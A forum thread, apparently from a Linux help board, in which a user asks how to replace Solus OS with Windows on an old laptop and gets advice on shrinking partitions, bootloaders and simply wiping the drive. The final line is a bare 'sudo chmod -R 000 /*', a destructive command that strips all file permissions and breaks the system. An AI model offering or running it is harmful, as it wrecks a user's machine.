You can wipe it all from the windows installer, just boot the installer and your good.

Hey guys. I am using this old laptop here, and I am not sure how to install windows on it now. I currently have Solus OS Budgie, and don't have unallocated space to install Windows. What do I do? My GParted disk is posted. Thanks!

you'd reduce the size of the existing partition, then make a new partition with NTFS. Also, windows will delete your bootloader so you should probably get a boot manager.

That's the thing, it won't let me reduce the /dev/sda/3 partition. And what exactly is a boot manager?

You can't shrink ext4 when its mounted, so you need to boot from a live disk then shrink

Oh ok. I have my Solus OS boot disk with me, so I will log into that and shrink it from there. But what should my next step be?

1. Make backup.

2. Shrink partition

3. Install windows and hope the bootloads are happy, if not, setup grub.

I don't really care about saving data on Linux, I am just doing this for my dad, since he is going to use this computer and he doesn't really like linux. So after I shrink the partition, would I go back into BIOS and load into my hard drive again? And if the bootloads aren't happy, how would I setup GRUB?

If you don't care about the linux, just wipe it and install only windows on it, dual booting can be a poian.

Then honestly just wipe it, make two partitions, dual boot.

Or install only Windows if you don't need Linux.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
